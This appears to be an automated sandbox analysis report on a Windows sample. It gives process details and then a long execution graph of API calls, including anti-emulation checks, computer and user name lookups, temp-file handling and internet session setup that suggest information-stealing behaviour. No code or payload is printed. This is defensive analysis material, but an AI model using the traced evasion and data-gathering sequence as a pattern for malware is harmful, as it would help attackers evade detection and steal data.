                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:14:35:58
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:timeout /t 10
                                                                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.7%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:4.6%
                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                          Total number of Limit Nodes:30
                                                                                                                                                                                          execution_graph 72791 6c44b694 72792 6c44b6a0 ___scrt_is_nonwritable_in_current_image 72791->72792 72821 6c44af2a 72792->72821 72794 6c44b6a7 72795 6c44b796 72794->72795 72796 6c44b6d1 72794->72796 72807 6c44b6ac ___scrt_is_nonwritable_in_current_image 72794->72807 72838 6c44b1f7 IsProcessorFeaturePresent 72795->72838 72825 6c44b064 72796->72825 72799 6c44b6e0 __RTC_Initialize 72799->72807 72828 6c44bf89 InitializeSListHead 72799->72828 72801 6c44b7b3 ___scrt_uninitialize_crt __RTC_Initialize 72802 6c44b6ee ___scrt_initialize_default_local_stdio_options 72804 6c44b6f3 _initterm_e 72802->72804 72803 6c44b79d ___scrt_is_nonwritable_in_current_image 72803->72801 72805 6c44b7d2 72803->72805 72806 6c44b828 72803->72806 72804->72807 72808 6c44b708 72804->72808 72842 6c44b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 72805->72842 72809 6c44b1f7 ___scrt_fastfail 6 API calls 72806->72809 72829 6c44b072 72808->72829 72812 6c44b82f 72809->72812 72816 6c44b86e dllmain_crt_process_detach 72812->72816 72817 6c44b83b 72812->72817 72813 6c44b7d7 72843 6c44bf95 __std_type_info_destroy_list 72813->72843 72815 6c44b70d 72815->72807 72818 6c44b711 _initterm 72815->72818 72820 6c44b840 72816->72820 72819 6c44b860 dllmain_crt_process_attach 72817->72819 72817->72820 72818->72807 72819->72820 72822 6c44af33 72821->72822 72844 6c44b341 IsProcessorFeaturePresent 72822->72844 72824 6c44af3f ___scrt_uninitialize_crt 72824->72794 72845 6c44af8b 72825->72845 72827 6c44b06b 72827->72799 72828->72802 72830 6c44b077 ___scrt_release_startup_lock 72829->72830 72831 6c44b082 72830->72831 72832 6c44b07b 72830->72832 72835 6c44b087 _configure_narrow_argv 72831->72835 72855 6c44b341 IsProcessorFeaturePresent 72832->72855 72834 6c44b080 72834->72815 72836 6c44b095 _initialize_narrow_environment 72835->72836 72837 6c44b092 72835->72837 72836->72834 72837->72815 72839 6c44b20c ___scrt_fastfail 72838->72839 72840 6c44b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 72839->72840 72841 6c44b302 ___scrt_fastfail 72840->72841 72841->72803 72842->72813 72843->72801 72844->72824 72846 6c44af9e 72845->72846 72847 6c44af9a 72845->72847 72848 6c44b028 72846->72848 72850 6c44afab ___scrt_release_startup_lock 72846->72850 72847->72827 72849 6c44b1f7 ___scrt_fastfail 6 API calls 72848->72849 72851 6c44b02f 72849->72851 72852 6c44afb8 _initialize_onexit_table 72850->72852 72853 6c44afd6 72850->72853 72852->72853 72854 6c44afc7 _initialize_onexit_table 72852->72854 72853->72827 72854->72853 72855->72834 72856 6c413060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 72861 6c44ab2a 72856->72861 72860 6c4130db 72865 6c44ae0c _crt_atexit _register_onexit_function 72861->72865 72863 6c4130cd 72864 6c44b320 5 API calls ___raise_securityfailure 72863->72864 72864->72860 72865->72863 72866 6c4135a0 72867 6c4135c4 InitializeCriticalSectionAndSpinCount getenv 72866->72867 72882 6c413846 __aulldiv 72866->72882 72869 6c4138fc strcmp 72867->72869 72881 6c4135f3 __aulldiv 72867->72881 72871 6c413912 strcmp 72869->72871 72869->72881 72870 6c4138f4 72871->72881 72872 6c4135f8 QueryPerformanceFrequency 72872->72881 72873 6c413622 _strnicmp 72875 6c413944 _strnicmp 72873->72875 72873->72881 72874 6c41376a QueryPerformanceCounter EnterCriticalSection 72876 6c4137b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 72874->72876 72879 6c41375c 72874->72879 72877 6c41395d 72875->72877 72875->72881 72876->72879 72880 6c4137fc LeaveCriticalSection 72876->72880 72878 6c413664 GetSystemTimeAdjustment 72878->72881 72879->72874 72879->72876 72879->72880 72879->72882 72880->72879 72880->72882 72881->72872 72881->72873 72881->72875 72881->72877 72881->72878 72881->72879 72883 6c44b320 5 API calls ___raise_securityfailure 72882->72883 72883->72870 72884 6c42c930 GetSystemInfo VirtualAlloc 72885 6c42c9a3 GetSystemInfo 72884->72885 72886 6c42c973 72884->72886 72888 6c42c9d0 72885->72888 72889 6c42c9b6 72885->72889 72900 6c44b320 5 API calls ___raise_securityfailure 72886->72900 72888->72886 72892 6c42c9d8 VirtualAlloc 72888->72892 72889->72888 72891 6c42c9bd 72889->72891 72890 6c42c99b 72891->72886 72893 6c42c9c1 VirtualFree 72891->72893 72894 6c42c9f0 72892->72894 72895 6c42c9ec 72892->72895 72893->72886 72901 6c44cbe8 GetCurrentProcess TerminateProcess 72894->72901 72895->72886 72900->72890 72902 6c44b830 72903 6c44b86e dllmain_crt_process_detach 72902->72903 72904 6c44b83b 72902->72904 72906 6c44b840 72903->72906 72905 6c44b860 dllmain_crt_process_attach 72904->72905 72904->72906 72905->72906 72907 6c44b9c0 72908 6c44b9ce dllmain_dispatch 72907->72908 72909 6c44b9c9 72907->72909 72911 6c44bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 72909->72911 72911->72908 72912 6c44b8ae 72913 6c44b8ba ___scrt_is_nonwritable_in_current_image 72912->72913 72914 6c44b8e3 dllmain_raw 72913->72914 72915 6c44b8de 72913->72915 72923 6c44b8c9 72913->72923 72916 6c44b8fd dllmain_crt_dispatch 72914->72916 72914->72923 72925 6c42bed0 DisableThreadLibraryCalls LoadLibraryExW 72915->72925 72916->72915 72916->72923 72918 6c44b91e 72919 6c44b94a 72918->72919 72926 6c42bed0 DisableThreadLibraryCalls LoadLibraryExW 72918->72926 72920 6c44b953 dllmain_crt_dispatch 72919->72920 72919->72923 72922 6c44b966 dllmain_raw 72920->72922 72920->72923 72922->72923 72924 6c44b936 dllmain_crt_dispatch dllmain_raw 72924->72919 72925->72918 72926->72924 72927 384ae 72928 384b0 72927->72928 72979 22b68 72928->72979 72937 21284 25 API calls 72938 384df 72937->72938 72939 21284 25 API calls 72938->72939 72940 384e9 72939->72940 73094 2148a GetPEB 72940->73094 72942 384f3 72943 21284 25 API calls 72942->72943 72944 384fd 72943->72944 72945 21284 25 API calls 72944->72945 72946 38507 72945->72946 72947 21284 25 API calls 72946->72947 72948 38511 72947->72948 73095 214a2 GetPEB 72948->73095 72950 3851b 72951 21284 25 API calls 72950->72951 72952 38525 72951->72952 72953 21284 25 API calls 72952->72953 72954 3852f 72953->72954 72955 21284 25 API calls 72954->72955 72956 38539 72955->72956 73096 214f9 72956->73096 72959 21284 25 API calls 72960 3854d 72959->72960 72961 21284 25 API calls 72960->72961 72962 38557 72961->72962 72963 21284 25 API calls 72962->72963 72964 38561 72963->72964 73119 21666 GetTempPathW 72964->73119 72967 21284 25 API calls 72968 38570 72967->72968 72969 21284 25 API calls 72968->72969 72970 3857a 72969->72970 72971 21284 25 API calls 72970->72971 72972 38584 72971->72972 73131 37041 72972->73131 73556 247e8 GetProcessHeap HeapAlloc 72979->73556 72982 247e8 3 API calls 72983 22b93 72982->72983 72984 247e8 3 API calls 72983->72984 72985 22bac 72984->72985 72986 247e8 3 API calls 72985->72986 72987 22bc3 72986->72987 72988 247e8 3 API calls 72987->72988 72989 22bda 72988->72989 72990 247e8 3 API calls 72989->72990 72991 22bf0 72990->72991 72992 247e8 3 API calls 72991->72992 72993 22c07 72992->72993 72994 247e8 3 API calls 72993->72994 72995 22c1e 72994->72995 72996 247e8 3 API calls 72995->72996 72997 22c38 72996->72997 72998 247e8 3 API calls 72997->72998 72999 22c4f 72998->72999 73000 247e8 3 API calls 72999->73000 73001 22c66 73000->73001 73002 247e8 3 API calls 73001->73002 73003 22c7d 73002->73003 73004 247e8 3 API calls 73003->73004 73005 22c93 73004->73005 73006 247e8 3 API calls 73005->73006 73007 22caa 73006->73007 73008 247e8 3 API calls 73007->73008 73009 22cc1 73008->73009 73010 247e8 3 API calls 73009->73010 73011 22cd8 73010->73011 73012 247e8 3 API calls 73011->73012 73013 22cf2 73012->73013 73014 247e8 3 API calls 73013->73014 73015 22d09 73014->73015 73016 247e8 3 API calls 73015->73016 73017 22d20 73016->73017 73018 247e8 3 API calls 73017->73018 73019 22d37 73018->73019 73020 247e8 3 API calls 73019->73020 73021 22d4e 73020->73021 73022 247e8 3 API calls 73021->73022 73023 22d65 73022->73023 73024 247e8 3 API calls 73023->73024 73025 22d7c 73024->73025 73026 247e8 3 API calls 73025->73026 73027 22d92 73026->73027 73028 247e8 3 API calls 73027->73028 73029 22dac 73028->73029 73030 247e8 3 API calls 73029->73030 73031 22dc3 73030->73031 73032 247e8 3 API calls 73031->73032 73033 22dda 73032->73033 73034 247e8 3 API calls 73033->73034 73035 22df1 73034->73035 73036 247e8 3 API calls 73035->73036 73037 22e07 73036->73037 73038 247e8 3 API calls 73037->73038 73039 22e1e 73038->73039 73040 247e8 3 API calls 73039->73040 73041 22e35 73040->73041 73042 247e8 3 API calls 73041->73042 73043 22e4c 73042->73043 73044 247e8 3 API calls 73043->73044 73045 22e66 73044->73045 73046 247e8 3 API calls 73045->73046 73047 22e7d 73046->73047 73048 247e8 3 API calls 73047->73048 73049 22e94 73048->73049 73050 247e8 3 API calls 73049->73050 73051 22eaa 73050->73051 73052 247e8 3 API calls 73051->73052 73053 22ec1 73052->73053 73054 247e8 3 API calls 73053->73054 73055 22ed8 73054->73055 73056 247e8 3 API calls 73055->73056 73057 22eec 73056->73057 73058 247e8 3 API calls 73057->73058 73059 22f03 73058->73059 73060 38643 73059->73060 73560 3859a GetPEB 73060->73560 73062 38649 73063 38844 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 73062->73063 73066 38659 73062->73066 73064 388a3 GetProcAddress 73063->73064 73065 388b5 73063->73065 73064->73065 73067 388e7 73065->73067 73068 388be GetProcAddress GetProcAddress 73065->73068 73071 38673 20 API calls 73066->73071 73069 38902 73067->73069 73070 388f0 GetProcAddress 73067->73070 73068->73067 73072 3890b GetProcAddress 73069->73072 73073 3891d 73069->73073 73070->73069 73071->73063 73072->73073 73074 38926 GetProcAddress GetProcAddress 73073->73074 73075 384c1 73073->73075 73074->73075 73076 210f0 GetCurrentProcess VirtualAllocExNuma 73075->73076 73077 21111 ExitProcess 73076->73077 73078 21098 VirtualAlloc 73076->73078 73080 210b8 _memset 73078->73080 73081 210ec 73080->73081 73082 210d5 VirtualFree 73080->73082 73083 21284 73081->73083 73082->73081 73084 212ac _memset 73083->73084 73085 212bb 13 API calls 73084->73085 73561 30c85 GetProcessHeap HeapAlloc GetComputerNameA 73085->73561 73087 213e9 73563 3d016 73087->73563 73091 213f4 73091->72937 73092 213b9 73092->73087 73093 213e2 ExitProcess 73092->73093 73094->72942 73095->72950 73573 214ad GetPEB 73096->73573 73099 214ad 2 API calls 73100 21516 73099->73100 73101 214ad 2 API calls 73100->73101 73118 215a1 73100->73118 73102 21529 73101->73102 73103 214ad 2 API calls 73102->73103 73102->73118 73104 21538 73103->73104 73105 214ad 2 API calls 73104->73105 73104->73118 73106 21547 73105->73106 73107 214ad 2 API calls 73106->73107 73106->73118 73108 21556 73107->73108 73109 214ad 2 API calls 73108->73109 73108->73118 73110 21565 73109->73110 73111 214ad 2 API calls 73110->73111 73110->73118 73112 21574 73111->73112 73113 214ad 2 API calls 73112->73113 73112->73118 73114 21583 73113->73114 73115 214ad 2 API calls 73114->73115 73114->73118 73116 21592 73115->73116 73117 214ad 2 API calls 73116->73117 73116->73118 73117->73118 73118->72959 73120 216a4 wsprintfW 73119->73120 73121 217f7 73119->73121 73122 216d0 CreateFileW 73120->73122 73124 3d016 __crtGetStringTypeA_stat 5 API calls 73121->73124 73122->73121 73123 216fb GetProcessHeap RtlAllocateHeap _time64 srand rand 73122->73123 73129 21754 _memset 73123->73129 73125 21807 73124->73125 73125->72967 73126 21733 WriteFile 73126->73121 73126->73129 73127 21768 CloseHandle CreateFileW 73127->73121 73128 2179e ReadFile 73127->73128 73128->73121 73128->73129 73129->73121 73129->73126 73129->73127 73130 217c3 GetProcessHeap RtlFreeHeap CloseHandle 73129->73130 73130->73121 73130->73122 73132 37051 73131->73132 73577 304e7 73132->73577 73136 37080 73582 30609 lstrlenA 73136->73582 73139 30609 3 API calls 73140 370a5 73139->73140 73141 30609 3 API calls 73140->73141 73142 370ae 73141->73142 73586 3058d 73142->73586 73144 370ba 73145 370e3 OpenEventA 73144->73145 73146 370f6 CreateEventA 73145->73146 73147 370dc CloseHandle 73145->73147 73148 304e7 lstrcpyA 73146->73148 73147->73145 73149 3711e 73148->73149 73590 30549 lstrlenA 73149->73590 73152 30549 2 API calls 73153 37185 73152->73153 73594 22f12 73153->73594 73156 38950 121 API calls 73157 372ca 73156->73157 73158 304e7 lstrcpyA 73157->73158 73373 3757f 73157->73373 73160 372e5 73158->73160 73162 30609 3 API calls 73160->73162 73165 372f7 73162->73165 73163 3058d lstrcpyA 73164 375af 73163->73164 73168 304e7 lstrcpyA 73164->73168 73166 3058d lstrcpyA 73165->73166 73167 37300 73166->73167 73171 30609 3 API calls 73167->73171 73169 375c6 73168->73169 73170 30609 3 API calls 73169->73170 73173 375d9 73170->73173 73172 3731b 73171->73172 73174 3058d lstrcpyA 73172->73174 74166 305c7 73173->74166 73176 37324 73174->73176 73179 30609 3 API calls 73176->73179 73178 3058d lstrcpyA 73182 375f2 73178->73182 73180 3733f 73179->73180 73181 3058d lstrcpyA 73180->73181 73183 37348 73181->73183 73184 37604 CreateDirectoryA 73182->73184 73188 30609 3 API calls 73183->73188 74170 21cfd 73184->74170 73190 37363 73188->73190 73189 3762e 74254 3824d 73189->74254 73192 3058d lstrcpyA 73190->73192 73194 3736c 73192->73194 73193 3763f 73196 3058d lstrcpyA 73193->73196 73195 30609 3 API calls 73194->73195 73197 37387 73195->73197 73198 37656 73196->73198 73199 3058d lstrcpyA 73197->73199 73200 3058d lstrcpyA 73198->73200 73201 37390 73199->73201 73202 37666 73200->73202 73205 30609 3 API calls 73201->73205 74261 30519 73202->74261 73207 373ab 73205->73207 73206 30609 3 API calls 73208 37685 73206->73208 73209 3058d lstrcpyA 73207->73209 73210 3058d lstrcpyA 73208->73210 73212 373b4 73209->73212 73211 3768e 73210->73211 73213 305c7 2 API calls 73211->73213 73214 30609 3 API calls 73212->73214 73215 376ab 73213->73215 73216 373cf 73214->73216 73217 3058d lstrcpyA 73215->73217 73218 3058d lstrcpyA 73216->73218 73220 376b4 73217->73220 73219 373d8 73218->73219 73222 30609 3 API calls 73219->73222 73221 376bd InternetOpenA InternetOpenA 73220->73221 73223 30519 lstrcpyA 73221->73223 73224 373f3 73222->73224 73225 37707 73223->73225 73226 3058d lstrcpyA 73224->73226 73227 304e7 lstrcpyA 73225->73227 73228 373fc 73226->73228 73229 37716 73227->73229 73232 30609 3 API calls 73228->73232 74265 309a2 GetWindowsDirectoryA 73229->74265 73235 37417 73232->73235 73233 30519 lstrcpyA 73234 37731 73233->73234 74283 24b2e 73234->74283 73237 3058d lstrcpyA 73235->73237 73239 37420 73237->73239 73242 30609 3 API calls 73239->73242 73241 37744 73244 304e7 lstrcpyA 73241->73244 73243 3743b 73242->73243 73245 3058d lstrcpyA 73243->73245 73246 37779 73244->73246 73247 37444 73245->73247 73248 21cfd lstrcpyA 73246->73248 73251 30609 3 API calls 73247->73251 73249 3778a 73248->73249 74433 25f39 73249->74433 73253 3745f 73251->73253 73255 3058d lstrcpyA 73253->73255 73257 37468 73255->73257 73256 377a2 73258 304e7 lstrcpyA 73256->73258 73262 30609 3 API calls 73257->73262 73259 377b6 73258->73259 73260 21cfd lstrcpyA 73259->73260 73261 377c0 73260->73261 73263 25f39 43 API calls 73261->73263 73264 37483 73262->73264 73265 377cc 73263->73265 73266 3058d lstrcpyA 73264->73266 74606 33259 strtok_s 73265->74606 73268 3748c 73266->73268 73271 30609 3 API calls 73268->73271 73269 377df 73270 304e7 lstrcpyA 73269->73270 73272 377f2 73270->73272 73273 374a7 73271->73273 73274 21cfd lstrcpyA 73272->73274 73275 3058d lstrcpyA 73273->73275 73276 37803 73274->73276 73277 374b0 73275->73277 73278 25f39 43 API calls 73276->73278 73281 30609 3 API calls 73277->73281 73279 3780f 73278->73279 74615 33390 strtok_s 73279->74615 73283 374cb 73281->73283 73282 37822 73284 21cfd lstrcpyA 73282->73284 73286 3058d lstrcpyA 73283->73286 73285 37833 73284->73285 74622 33b86 73285->74622 73288 374d4 73286->73288 73292 30609 3 API calls 73288->73292 73294 374ef 73292->73294 73296 3058d lstrcpyA 73294->73296 73297 374f8 73296->73297 73301 30609 3 API calls 73297->73301 73303 37513 73301->73303 73305 3058d lstrcpyA 73303->73305 73307 3751c 73305->73307 73315 30609 3 API calls 73307->73315 73319 37537 73315->73319 73323 3058d lstrcpyA 73319->73323 73328 37540 73323->73328 73339 30609 3 API calls 73328->73339 73340 3755b 73339->73340 73344 3058d lstrcpyA 73340->73344 73348 37564 73344->73348 74149 3257f 73348->74149 73368 3cc6c 10 API calls 73368->73373 74158 31c4a 73373->74158 73557 22b7c 73556->73557 73558 2480f 73556->73558 73557->72982 73559 24818 lstrlenA 73558->73559 73559->73557 73559->73559 73560->73062 73562 21385 73561->73562 73562->73087 73571 30c53 GetProcessHeap HeapAlloc GetUserNameA 73562->73571 73564 3d020 IsDebuggerPresent 73563->73564 73565 3d01e 73563->73565 73572 3d975 73564->73572 73565->73091 73568 3d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 73569 3d485 GetCurrentProcess TerminateProcess 73568->73569 73570 3d47d __call_reportfault 73568->73570 73569->73091 73570->73569 73571->73092 73572->73568 73576 214e9 73573->73576 73574 214d9 lstrcmpiW 73575 214ef 73574->73575 73574->73576 73575->73099 73575->73118 73576->73574 73576->73575 73578 304f2 73577->73578 73579 30513 73578->73579 73580 30509 lstrcpyA 73578->73580 73581 30c53 GetProcessHeap HeapAlloc GetUserNameA 73579->73581 73580->73579 73581->73136 73584 30630 73582->73584 73583 30656 73583->73139 73584->73583 73585 30643 lstrcpyA lstrcatA 73584->73585 73585->73583 73587 3059c 73586->73587 73588 305c3 73587->73588 73589 305bb lstrcpyA 73587->73589 73588->73144 73589->73588 73592 3055e 73590->73592 73591 30587 73591->73152 73592->73591 73593 3057d lstrcpyA 73592->73593 73593->73591 73595 247e8 3 API calls 73594->73595 73596 22f27 73595->73596 73597 247e8 3 API calls 73596->73597 73598 22f3e 73597->73598 73599 247e8 3 API calls 73598->73599 73600 22f55 73599->73600 73601 247e8 3 API calls 73600->73601 73602 22f6c 73601->73602 73603 247e8 3 API calls 73602->73603 73604 22f85 73603->73604 73605 247e8 3 API calls 73604->73605 73606 22f9c 73605->73606 73607 247e8 3 API calls 73606->73607 73608 22fb3 73607->73608 73609 247e8 3 API calls 73608->73609 73610 22fca 73609->73610 73611 247e8 3 API calls 73610->73611 73612 22fe4 73611->73612 73613 247e8 3 API calls 73612->73613 73614 22ffb 73613->73614 73615 247e8 3 API calls 73614->73615 73616 23011 73615->73616 73617 247e8 3 API calls 73616->73617 73618 23028 73617->73618 73619 247e8 3 API calls 73618->73619 73620 2303f 73619->73620 73621 247e8 3 API calls 73620->73621 73622 23056 73621->73622 73623 247e8 3 API calls 73622->73623 73624 2306d 73623->73624 73625 247e8 3 API calls 73624->73625 73626 23084 73625->73626 73627 247e8 3 API calls 73626->73627 73628 2309b 73627->73628 73629 247e8 3 API calls 73628->73629 73630 230b2 73629->73630 73631 247e8 3 API calls 73630->73631 73632 230c9 73631->73632 73633 247e8 3 API calls 73632->73633 73634 230df 73633->73634 73635 247e8 3 API calls 73634->73635 73636 230f6 73635->73636 73637 247e8 3 API calls 73636->73637 73638 2310f 73637->73638 73639 247e8 3 API calls 73638->73639 73640 23123 73639->73640 73641 247e8 3 API calls 73640->73641 73642 2313a 73641->73642 73643 247e8 3 API calls 73642->73643 73644 23154 73643->73644 73645 247e8 3 API calls 73644->73645 73646 2316b 73645->73646 73647 247e8 3 API calls 73646->73647 73648 23182 73647->73648 73649 247e8 3 API calls 73648->73649 73650 23199 73649->73650 73651 247e8 3 API calls 73650->73651 73652 231af 73651->73652 73653 247e8 3 API calls 73652->73653 73654 231c5 73653->73654 73655 247e8 3 API calls 73654->73655 73656 231dc 73655->73656 73657 247e8 3 API calls 73656->73657 73658 231f2 73657->73658 73659 247e8 3 API calls 73658->73659 73660 2320c 73659->73660 73661 247e8 3 API calls 73660->73661 73662 23223 73661->73662 73663 247e8 3 API calls 73662->73663 73664 2323a 73663->73664 73665 247e8 3 API calls 73664->73665 73666 23250 73665->73666 73667 247e8 3 API calls 73666->73667 73668 23267 73667->73668 73669 247e8 3 API calls 73668->73669 73670 2327e 73669->73670 73671 247e8 3 API calls 73670->73671 73672 23295 73671->73672 73673 247e8 3 API calls 73672->73673 73674 232ab 73673->73674 73675 247e8 3 API calls 73674->73675 73676 232c2 73675->73676 73677 247e8 3 API calls 73676->73677 73678 232d9 73677->73678 73679 247e8 3 API calls 73678->73679 73680 232f0 73679->73680 73681 247e8 3 API calls 73680->73681 73682 23306 73681->73682 73683 247e8 3 API calls 73682->73683 73684 2331c 73683->73684 73685 247e8 3 API calls 73684->73685 73686 23333 73685->73686 73687 247e8 3 API calls 73686->73687 73688 23349 73687->73688 73689 247e8 3 API calls 73688->73689 73690 2335d 73689->73690 73691 247e8 3 API calls 73690->73691 73692 23374 73691->73692 73693 247e8 3 API calls 73692->73693 73694 2338a 73693->73694 73695 247e8 3 API calls 73694->73695 73696 233a1 73695->73696 73697 247e8 3 API calls 73696->73697 73698 233b8 73697->73698 73699 247e8 3 API calls 73698->73699 73700 233cf 73699->73700 73701 247e8 3 API calls 73700->73701 73702 233e6 73701->73702 73703 247e8 3 API calls 73702->73703 73704 233fd 73703->73704 73705 247e8 3 API calls 73704->73705 73706 23414 73705->73706 73707 247e8 3 API calls 73706->73707 73708 2342e 73707->73708 73709 247e8 3 API calls 73708->73709 73710 23445 73709->73710 73711 247e8 3 API calls 73710->73711 73712 2345c 73711->73712 73713 247e8 3 API calls 73712->73713 73714 23473 73713->73714 73715 247e8 3 API calls 73714->73715 73716 2348a 73715->73716 73717 247e8 3 API calls 73716->73717 73718 234a1 73717->73718 73719 247e8 3 API calls 73718->73719 73720 234b8 73719->73720 73721 247e8 3 API calls 73720->73721 73722 234cf 73721->73722 73723 247e8 3 API calls 73722->73723 73724 234e9 73723->73724 73725 247e8 3 API calls 73724->73725 73726 23500 73725->73726 73727 247e8 3 API calls 73726->73727 73728 23517 73727->73728 73729 247e8 3 API calls 73728->73729 73730 2352e 73729->73730 73731 247e8 3 API calls 73730->73731 73732 23545 73731->73732 73733 247e8 3 API calls 73732->73733 73734 2355c 73733->73734 73735 247e8 3 API calls 73734->73735 73736 23573 73735->73736 73737 247e8 3 API calls 73736->73737 73738 2358a 73737->73738 73739 247e8 3 API calls 73738->73739 73740 235a4 73739->73740 73741 247e8 3 API calls 73740->73741 73742 235bb 73741->73742 73743 247e8 3 API calls 73742->73743 73744 235d2 73743->73744 73745 247e8 3 API calls 73744->73745 73746 235e9 73745->73746 73747 247e8 3 API calls 73746->73747 73748 23600 73747->73748 73749 247e8 3 API calls 73748->73749 73750 23617 73749->73750 73751 247e8 3 API calls 73750->73751 73752 2362d 73751->73752 73753 247e8 3 API calls 73752->73753 73754 23643 73753->73754 73755 247e8 3 API calls 73754->73755 73756 2365d 73755->73756 73757 247e8 3 API calls 73756->73757 73758 23674 73757->73758 73759 247e8 3 API calls 73758->73759 73760 2368b 73759->73760 73761 247e8 3 API calls 73760->73761 73762 236a1 73761->73762 73763 247e8 3 API calls 73762->73763 73764 236b8 73763->73764 73765 247e8 3 API calls 73764->73765 73766 236cf 73765->73766 73767 247e8 3 API calls 73766->73767 73768 236e3 73767->73768 73769 247e8 3 API calls 73768->73769 73770 236f9 73769->73770 73771 247e8 3 API calls 73770->73771 73772 23713 73771->73772 73773 247e8 3 API calls 73772->73773 73774 2372a 73773->73774 73775 247e8 3 API calls 73774->73775 73776 23741 73775->73776 73777 247e8 3 API calls 73776->73777 73778 23758 73777->73778 73779 247e8 3 API calls 73778->73779 73780 2376f 73779->73780 73781 247e8 3 API calls 73780->73781 73782 23786 73781->73782 73783 247e8 3 API calls 73782->73783 73784 2379a 73783->73784 73785 247e8 3 API calls 73784->73785 73786 237b1 73785->73786 73787 247e8 3 API calls 73786->73787 73788 237cb 73787->73788 73789 247e8 3 API calls 73788->73789 73790 237e2 73789->73790 73791 247e8 3 API calls 73790->73791 73792 237f6 73791->73792 73793 247e8 3 API calls 73792->73793 73794 2380a 73793->73794 73795 247e8 3 API calls 73794->73795 73796 23821 73795->73796 73797 247e8 3 API calls 73796->73797 73798 23838 73797->73798 73799 247e8 3 API calls 73798->73799 73800 2384f 73799->73800 73801 247e8 3 API calls 73800->73801 73802 23866 73801->73802 73803 247e8 3 API calls 73802->73803 73804 23880 73803->73804 73805 247e8 3 API calls 73804->73805 73806 23897 73805->73806 73807 247e8 3 API calls 73806->73807 73808 238ae 73807->73808 73809 247e8 3 API calls 73808->73809 73810 238c5 73809->73810 73811 247e8 3 API calls 73810->73811 73812 238db 73811->73812 73813 247e8 3 API calls 73812->73813 73814 238f2 73813->73814 73815 247e8 3 API calls 73814->73815 73816 23906 73815->73816 73817 247e8 3 API calls 73816->73817 73818 2391d 73817->73818 73819 247e8 3 API calls 73818->73819 73820 23937 73819->73820 73821 247e8 3 API calls 73820->73821 73822 2394e 73821->73822 73823 247e8 3 API calls 73822->73823 73824 23965 73823->73824 73825 247e8 3 API calls 73824->73825 73826 2397c 73825->73826 73827 247e8 3 API calls 73826->73827 73828 23993 73827->73828 73829 247e8 3 API calls 73828->73829 73830 239aa 73829->73830 73831 247e8 3 API calls 73830->73831 73832 239c1 73831->73832 73833 247e8 3 API calls 73832->73833 73834 239d8 73833->73834 73835 247e8 3 API calls 73834->73835 73836 239f2 73835->73836 73837 247e8 3 API calls 73836->73837 73838 23a09 73837->73838 73839 247e8 3 API calls 73838->73839 73840 23a20 73839->73840 73841 247e8 3 API calls 73840->73841 73842 23a37 73841->73842 73843 247e8 3 API calls 73842->73843 73844 23a4e 73843->73844 73845 247e8 3 API calls 73844->73845 73846 23a65 73845->73846 73847 247e8 3 API calls 73846->73847 73848 23a7c 73847->73848 73849 247e8 3 API calls 73848->73849 73850 23a90 73849->73850 73851 247e8 3 API calls 73850->73851 73852 23aaa 73851->73852 73853 247e8 3 API calls 73852->73853 73854 23ac1 73853->73854 73855 247e8 3 API calls 73854->73855 73856 23ad7 73855->73856 73857 247e8 3 API calls 73856->73857 73858 23aee 73857->73858 73859 247e8 3 API calls 73858->73859 73860 23b05 73859->73860 73861 247e8 3 API calls 73860->73861 73862 23b1c 73861->73862 73863 247e8 3 API calls 73862->73863 73864 23b33 73863->73864 73865 247e8 3 API calls 73864->73865 73866 23b4a 73865->73866 73867 247e8 3 API calls 73866->73867 73868 23b61 73867->73868 73869 247e8 3 API calls 73868->73869 73870 23b75 73869->73870 73871 247e8 3 API calls 73870->73871 73872 23b8c 73871->73872 73873 247e8 3 API calls 73872->73873 73874 23ba3 73873->73874 73875 247e8 3 API calls 73874->73875 73876 23bba 73875->73876 73877 247e8 3 API calls 73876->73877 73878 23bd1 73877->73878 73879 247e8 3 API calls 73878->73879 73880 23be8 73879->73880 73881 247e8 3 API calls 73880->73881 73882 23bff 73881->73882 73883 247e8 3 API calls 73882->73883 73884 23c19 73883->73884 73885 247e8 3 API calls 73884->73885 73886 23c30 73885->73886 73887 247e8 3 API calls 73886->73887 73888 23c47 73887->73888 73889 247e8 3 API calls 73888->73889 73890 23c5e 73889->73890 73891 247e8 3 API calls 73890->73891 73892 23c75 73891->73892 73893 247e8 3 API calls 73892->73893 73894 23c8c 73893->73894 73895 247e8 3 API calls 73894->73895 73896 23ca3 73895->73896 73897 247e8 3 API calls 73896->73897 73898 23cb7 73897->73898 73899 247e8 3 API calls 73898->73899 73900 23cd1 73899->73900 